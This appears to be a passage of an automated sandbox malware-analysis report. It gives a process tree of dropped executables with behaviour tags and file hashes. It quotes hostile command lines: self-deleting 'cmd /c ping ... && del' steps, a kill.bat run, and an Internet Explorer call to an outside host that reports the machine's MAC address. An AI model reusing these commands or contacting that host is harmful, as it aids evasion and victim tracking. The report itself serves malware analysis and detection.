C:\Users\Admin\Local Settings\Temp\5.exe"C:\Users\Admin\Local Settings\Temp\5.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\temp\syccom\q1222211.exe"C:\Windows\temp\syccom\q1222211.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\temp\syccom\Source.exeC:\Windows\temp\syccom\Source.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1060 -
C:\Users\Admin\Local Settings\Temp\ie.exe"C:\Users\Admin\Local Settings\Temp\ie.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\TAEKMAN.exe"C:\Windows\TAEKMAN.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1052 -
C:\Windows\SysWOW64\cmd.execmd /c del "C:\Users\Admin\Local Settings\Temp\ie.exe"3⤵
- System Location Discovery: System Language Discovery
PID:3200 -
C:\Users\Admin\Local Settings\Temp\146.exe"C:\Users\Admin\Local Settings\Temp\146.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3128 -
C:\Users\Admin\Local Settings\Temp\si.exe"C:\Users\Admin\Local Settings\Temp\si.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3208 -
C:\Users\Admin\Local Settings\Temp\zm.exe"C:\Users\Admin\Local Settings\Temp\zm.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Local Settings\Temp\kill.bat""3⤵
- System Location Discovery: System Language Discovery
PID:2608 -
C:\Users\Admin\Local Settings\Temp\tj.exe"C:\Users\Admin\Local Settings\Temp\tj.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://tj.lele444.com/tongji/g.asp?mac=E2:62:22:BA:F6:A3&id=admin3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4984 CREDAT:17410 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1336 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 && del "C:\Users\Admin\Local Settings\Temp\tj.exe"3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2428
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize471B
MD57397bc535c3fdecb6c04cae2713a2439
SHA14b147507f647ff16c8c98d402d9879f265e6e934
SHA2561d9f5b2f5e87877344701a5ed6e9a9ab49ad47c72183893cf5a3dfc89ffaf075
SHA5124fc311a683e25d5e1336aa382101f6eed214928a2bfa14a6bd3a149b44e089dd241dd06c755a5c1d8c8b2563bd04e0254ce26ecc306e25d7ff22223f61f50245
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize404B
MD5e39e6121e7d4c8a77f6acc9354f604d6
SHA127a3766530fb04cc89ee1deb19e9779a62a189dd
SHA256e45367895c0a0a2258d37a2c9c471c266f9980cf155cce21647b1fe6a8190a0c
SHA51209a8822d237bd0243b61cd0b5ab451461ac07fed24ccfc77fb850027da64be223899dc26894c93cb4ba666c531e7cecea887fa66a2781f4d709fde63cc703b12
-
Filesize
15KB
MD51a545d0052b581fbb2ab4c52133846bc
SHA162f3266a9b9925cd6d98658b92adec673cbe3dd3
SHA256557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1
SHA512bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
218KB
MD5ba926a2e63110eeef92f9d4fa6ee8366
SHA15b9c4f5099c69a95a63eef8273d947178f9da48b
SHA25656c3d5d9ba29166a712c013ecb0edc4c94847323ca57a29d40492993f5efb2a0
SHA512fbc7afa1b11672792aab61d2d419fc8d6206d84e9f5328d4da8a0028377f0095767bf7c54eb7246989401a8d23768c937516611fae512b285453320e859d8c4f
-
Filesize
183KB
MD55587b9705faea003ae2695bf0999d16c
SHA156dad20d4f75bc3fbd2f248e7f177f47a69e477f
SHA256f43cf1d0bbee74af7208439f55f0516550ca5d6992f39fa77fb0ba5eace212e9
SHA51236b2f58578c0e7498e8c685926dd0e01503659e46cf8183f8cd38a4b265472f57dbe287918c39153015f2e2d47640226404aa8ad0b296cbcf1f6ba99b5454704
-
Filesize
70KB
MD5b99fb8dcd8c910814bbea8518e0400f4
SHA15f5d5a36c0fe18ae7e6d2fe10aeb125ec37bcb33
SHA2562b285c7d5889795efab9e1371cf1fcbf2d9722a88bc1ac95edfa4d798aecaddb
SHA5122a7ea71f57e7c4fad413467460a966dda4e45ed5271a8a777437d25e318274a8a84ad25dbd8246fe70c1e11affb05c48e69d8e1c4e0ba8a64ad66631f373c452
-
Filesize
49KB
MD5f390eee8d1e2093894c5b149ea63bc52
SHA17ef1ac5ba347d8ffba26e323db1a90d66676f2e0
SHA2563e01b95f3b5c49c03297407d186ad69377a5a2f643fb7dfa87bb0b29bfea292f
SHA512e5a170f8875497d7082db68008eb5bdc9c3adf9efeabcfc690a3af1d60ae86f6bd114cc8e0d9c5c2ce54ae806daed38442d262344bd51aea422635191f612a61
-
Filesize
7KB
MD5c943f490b04e6fbd8bc9de3f4e5d2830
SHA1ca01699a582f189c5c40cc5cd7871fc025f8d775
SHA2566ef783826b33fea4669acd6e7248c7883537562f2f140e29a96c3abe2f6455fa
SHA5125aa29547762f71fa5bc37cd8332b48b4b4f76e7bf1c85fb2fa6aac79e404866cd2b9dde33da3c84da77b986bced6eeb5a1042b85ee4c1e8199867fa95482592b
-
Filesize
60KB
MD5542480c776a3deddfae1a9709bdcd540
SHA19882500938452ad2736e7144a1483568a1d31c59
SHA2564b28b76821044eddf98234ef1825f0d7b15c257c6f1c589734ab5dfc9a5509a1
SHA512d9738dfda4a547f5331c72db02f27c0e28bc8df458e7672a8147013f161574c1382ace0d484a88748db2c0036fe5f4c0daa6c0a58eed528ce80f939a05e82c62
-
Filesize
94B
MD5f7d49f5167b6d829a54146ef3287abf3
SHA1828c178af49b0a144a036530cd6199ef146e37f8
SHA25671d170b56b07c7a47e65fdddd24dc17e40f8fc144e2fa4fa6f303388bdc7513c
SHA5123a1e14f86a7427234b2e97a3e24a0bbd81a83a008d5b190e8a661e1d06c5037da3867cae2a541e4c4c28e7f740bbbf5f520f3d6feb29a8a240208ab2fb097df2
-
Filesize
132B
MD51e7b4e1c312b95d33757152ef2b858dd
SHA13f8683cc9bd354fff509548bf3519c8edbc02f55
SHA256ff0d4134f546d7e50f252fea80e24570cf110e597ef21059611eb8271dadc9a3
SHA512506e3e1fd991286238b3df1f58233fffe5950b10464ea54da2b18261adaa810c5f934f2fabdeea10fb69b168bf5e332917edece621d3a92b97f16a2c8f8070b4
-
Filesize
8KB
MD5f445fc920b03a0d552dd6aed23b64a4e
SHA1abd84d31130047efcbc1fe81b771e7f29f67eec0
SHA256fde2e50cf160786220a1689e374cd36fccb1e398349971609f5113ab8092388b
SHA512b7a879233469c190f640886032cacec44edea5ebdd60850199d7131320b3b0e189195036a91a2aa3452b4e4295dfac7b20f5d67d6117dd4cc939f545e2879466
-
Filesize
20KB
MD5294b280708d5fe53acdf7899e33a38a6
SHA1c906e73493e38bda6733dcf11bcf404836e99a4f
SHA2566f975bccfb0513dcc702be4e6e5977c2cd1fc4879d6f89fa2731182e3739bd39
SHA512b067935b17a286336cdf70b37569cc737a7adab83b8b33f28c1d759eee34ec6a96689a4fa68adb6bb53a2b96d5c1075df19763def09c12d6d9c5f21618857cf1
-
Filesize
96KB
MD542c3027137bf43d8eb32805817ffca5d
SHA1545bc4a38caae604753d77af167e2dd8e3e5b76a
SHA256f7ad3492db50a528c184d0e2b5ca8b521060deefd6a90d821d9e24010d52fea7
SHA5125f3156fed967707c8f2b3da6ea81cf7ec5952deb285d6bac7a14cae8247bdf2b4e96edce32bea6d5b3b4f7e86d1b5be05f2c6eb46fd56f180826d7f1177e2d15